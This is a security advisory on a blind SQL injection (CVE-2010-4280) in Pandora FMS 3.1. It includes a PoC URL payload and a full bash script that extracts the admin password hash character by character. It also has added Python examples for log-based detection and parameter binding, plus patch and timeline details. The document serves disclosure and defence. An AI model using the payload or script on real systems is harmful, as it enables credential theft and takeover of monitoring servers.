Pandora Fms 3.1 – Blind SQL Injection

  • Author: Juan Galiana Lara
    Date: 2010-11-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15642/

    [+] Introduction
    
    Pandora FMS (for Pandora Flexible Monitoring System) is a software
    solution for monitoring computer networks. It allows monitoring in a
    visual way the status and performance of several parameters from
    different operating systems, servers, applications and hardware systems
    such as firewalls, proxies, databases, web servers or routers.
    
    It can be deployed in almost any operating system. It features remote
    monitoring (WMI, SNMP, TCP, UDP, ICMP, HTTP...) and it can also use
    agents. An agent is available for each platform. It can also monitor
    hardware systems with a TCP/IP stack, such as load balancers, routers,
    network switches, printers or firewalls.
    
    This software has several servers that process and get information from
    different sources, using WMI for gathering remote Windows information, a
    predictive server, a plug-in server which makes complex user-defined
    network tests, an advanced export server to replicate data between
    different sites of Pandora FMS, a network discovery server, and an SNMP
    Trap console.
    
    Released under the terms of the GNU General Public License, Pandora FMS
    is free software.
    
    4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10
    
    The group_id parameter of operation/agentes/estado_agente.php is
    vulnerable to blind SQL injection.
    
    
    PoC:
    http://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281
    
    
    Exploit:
    
    #!/bin/bash
    # Pandora Flexible Monitoring System Blind SQL Injection PoC
    # Juan Galiana Lara
    # Gets the md5 hash password from a specific user
    #
    # configure HOST, COOKIE and GROUP_ID before using it
    # usage
    # $ ./getpassword.sh
    # 74b444ff2785ea8bb9ae02c13b6a71f1

    HOST="HOST"
    TARGET_USER="0x61646d696e" # admin
    PATTERN="Interval"         # text matched in the response to tell a true from a false result
    COOKIE="rq842tci6e5ib7t918c6sv1ml4"
    CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z)
    GROUP_ID=2

    j=1
    while [[ $j -lt 33 ]]; do          # one iteration per character of the 32-character hash
        i=0
        while [[ $i -lt ${#CHARSET[@]} ]]; do
            c=$(printf '%d' "'${CHARSET[$i]}")   # ASCII code of the candidate character

            URL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281"
            curl "$URL" --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q "$PATTERN"
            if [ $? -eq 0 ]; then echo -n "${CHARSET[$i]}"; break; fi
            let i++
        done
        if [[ $i -eq ${#CHARSET[@]} ]]; then echo "Something went wrong!"; exit 1; fi
        let j++
    done
    echo
    exit 0
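An extraction loop like the one above leaves a recognisable trail in the console's web server access log: one client issuing many requests to operation/agentes/estado_agente whose group_id value is not an integer and carries the ord(substring(...)) comparison, differing only in the position and character code. The following Python is an added detection example for operators of an affected console; it is not part of the advisory or of Pandora FMS. The log lines are constructed; the only page-derived values in them are the vulnerable page, the group_id parameter and the PoC query shape. The threshold in probing_sources is an assumption chosen for the sample.

```python
"""Access-log detection for the blind SQL injection probe pattern described above.
Added defender-side example; not part of the advisory. Sample log lines are constructed."""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

VULN_PAGE = "operation/agentes/estado_agente"   # page named in the advisory
PARAM = "group_id"                                # parameter named in the advisory

# Combined-style access log: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# The boolean oracle the PoC relies on: ord(substring(<column>, <pos>, 1)) = <code>
ORACLE_RE = re.compile(r"ord\s*\(\s*substring\s*\(", re.IGNORECASE)

# Constructed sample: one legitimate request, three probes from one client that walk
# the character codes 48, 49, 50 for position 1, one malformed value, one unrelated hit.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [30/Nov/2010:10:00:01 +0000] "GET /pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=2 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [30/Nov/2010:10:00:02 +0000] "GET /pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=2%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=48%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281 HTTP/1.1" 200 4090',
    '10.0.0.9 - - [30/Nov/2010:10:00:02 +0000] "GET /pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=2%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [30/Nov/2010:10:00:03 +0000] "GET /pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=2%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=50%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281 HTTP/1.1" 200 4090',
    '10.0.0.7 - - [30/Nov/2010:10:00:04 +0000] "GET /pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=2%27 HTTP/1.1" 500 310',
    '10.0.0.5 - - [30/Nov/2010:10:00:05 +0000] "GET /pandora_console/index.php?sec=estado HTTP/1.1" 200 7200',
])


def parse_line(line):
    """Return the fields of one access log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(target):
    """Classify one request target. Returns (kind, group_id) with kind one of
    'not_applicable', 'ok', 'boolean_oracle' or 'malformed_group_id'."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("sec2", [""])[0] != VULN_PAGE or PARAM not in params:
        return ("not_applicable", None)
    group_id = params[PARAM][0]          # parse_qs has already percent-decoded it
    if re.fullmatch(r"[0-9]+", group_id):
        return ("ok", group_id)
    if ORACLE_RE.search(group_id):
        return ("boolean_oracle", group_id)
    return ("malformed_group_id", group_id)


def scan_log(text):
    """One finding per suspicious request: client, timestamp, kind and the first 60
    decoded characters of the offending group_id value."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        kind, group_id = classify_request(rec["target"])
        if kind in ("boolean_oracle", "malformed_group_id"):
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "kind": kind,
                             "group_id": group_id[:60]})
    return findings


def probing_sources(findings, threshold=3):
    """Clients with at least `threshold` oracle probes. A single hit may be a scanner
    signature; a run of them is a character-by-character extraction in progress."""
    counts = Counter(f["ip"] for f in findings if f["kind"] == "boolean_oracle")
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ts"], f["ip"], f["kind"], f["group_id"])
    print("extraction sources:", probing_sources(found))
```

Percent-decoding before matching matters: the probe is entirely URL-encoded on the wire, so a rule that looks for `ord(substring(` in the raw request line never fires. Status codes and response sizes are kept in the parsed record because the true and false branches of a blind injection typically differ in size, which is a second signal worth correlating once a source is flagged.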
    
    
    The fix for these kinds of issues was the implementation of a generic
    filter against SQL injection. A proper fix is planned for a major version.
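The distinction the advisory draws, a generic filter now and a proper fix later, is the difference between recognising attack syntax in request data and refusing anything that is not the expected type before a query is built. The following Python is an added example of the latter and is not Pandora FMS code: the table and column names are borrowed from the query shape in the PoC, the sqlite3 schema and rows are constructed, and the function names are this example's own. The group_id value is parsed as a list of integers and each one is bound as a query parameter, so the PoC payload is rejected at the boundary whatever SQL keywords it happens to contain.

```python
"""Boundary validation and parameter binding for a group_id-style filter.
Added example; not Pandora FMS code. Table and column names follow the PoC query,
the sqlite3 schema and rows are constructed."""
import re
import sqlite3

INT_RE = re.compile(r"[0-9]+")

# group_id value from the advisory's PoC, percent-decoded, used here only as a test input
POC_GROUP_ID = ("2) and (select password from tusuario where ord(substring(password,1,1))=49 "
                "and id_user=0x61646d696e) union select id_agente, nombre from tagente "
                "where id_grupo in (1")


def build_agents_query_unsafe(raw_group_ids):
    """The anti-pattern: request data interpolated into the SQL text. Kept for contrast
    only and never executed here; the PoC's group_id value is written for this shape."""
    return "SELECT id_agente, nombre FROM tagente WHERE id_grupo IN (%s)" % raw_group_ids


def parse_group_ids(raw):
    """Accept a comma-separated list of non-negative integers and nothing else.
    Rejecting by type needs no knowledge of SQL syntax, which is exactly what a
    generic keyword filter has to guess at."""
    ids = []
    for piece in raw.split(","):
        piece = piece.strip()
        if not INT_RE.fullmatch(piece):
            raise ValueError("group_id must be a comma-separated list of integers, got %r" % raw)
        ids.append(int(piece))
    return ids


def list_agents_safe(conn, raw_group_ids):
    """Run the agent listing with every id bound as a parameter. An IN list gets one
    placeholder per value, so user data never appears in the SQL text at all."""
    ids = parse_group_ids(raw_group_ids)
    placeholders = ",".join("?" * len(ids))
    sql = ("SELECT id_agente, nombre FROM tagente WHERE id_grupo IN (%s) "
           "ORDER BY id_agente") % placeholders
    return conn.execute(sql, ids).fetchall()


def is_rejected(conn, raw_group_ids):
    """True if the safe path refuses the value before touching the database."""
    try:
        list_agents_safe(conn, raw_group_ids)
    except ValueError:
        return True
    return False


def demo_db():
    """In-memory stand-in for the two tables the PoC query touches (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tagente (id_agente INTEGER PRIMARY KEY, nombre TEXT, id_grupo INTEGER)")
    conn.execute("CREATE TABLE tusuario (id_user TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO tagente VALUES (?, ?, ?)",
                     [(1, "web01", 2), (2, "db01", 2), (3, "fw01", 24)])
    conn.execute("INSERT INTO tusuario VALUES (?, ?)", ("admin", "<md5 hash placeholder>"))
    conn.commit()
    return conn


if __name__ == "__main__":
    db = demo_db()
    print("group 2:", list_agents_safe(db, "2"))
    print("groups 24,2:", list_agents_safe(db, "24, 2"))
    print("PoC value rejected:", is_rejected(db, POC_GROUP_ID))
    print("unsafe text would have been:", build_agents_query_unsafe(POC_GROUP_ID))
```

The unsafe builder is included so the two shapes can be compared side by side; it is never run against the database. Note that parameter binding alone is not enough for an IN clause with a variable number of values, which is why the safe version generates one placeholder per validated integer rather than splicing the list in as text.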
    
    
    [+] Impact
    
    An attacker can execute operating system commands, inject remote code in
    the context of the application, get arbitrary files from the filesystem or
    extract any data from the database, including passwords and confidential
    information about the monitored network/systems. It is also possible to
    bypass authentication or escalate privileges to become admin, gaining full
    control of the web application and web server. These vulnerabilities have
    a high impact on the confidentiality, integrity and availability of the
    system.
    
    
    [+] Systems affected
    
    Versions prior to and including 3.1 of Pandora FMS are affected.
    
    
    [+] Solution
    
    Apply the security fix for version 3.1:
    http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
    
    
    Or upgrade to version 3.1.1 from
    http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/
    
    
    [+] Timeline
    
    Aug 2010: First contact with vendor
    Aug 2010: Confirmation from vendor
    Sept 2010: Second contact: SQL Injection vulnerabilities
    Sept 2010: Confirmation that the fix will be released on October
    Oct 2010: PandoraFMS security patch for 3.1 version released
    Oct 2010: Request for CVE numbers
    Nov 2010: PandoraFMS version 3.1.1 released
    Nov 2010: Disclosure of this advisory
    
    
    [+] References
    
    Official PandoraFMS site: http://pandorafms.org/
    SourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/
    Wikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS
    Common Vulnerability Scoring System (CVSS) v2 calculator:
    http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2
    Common Vulnerabilities and Exposures (CVE): http://cve.mitre.org/
    
    
    [+] Credits
    
    These vulnerabilities have been discovered by Juan Galiana Lara -
    @jgaliana - http://juangaliana.blogspot.com/
    
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.10 (GNU/Linux)
    
    iQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy
    YbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s
    IVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9
    WIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4
    cC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP
    JPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP
    8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4
    7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH
    pARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5
    yNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4
    oBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF
    sn9vRJk4gc/PozOXDjC3
    =WmOh
    -----END PGP SIGNATURE-----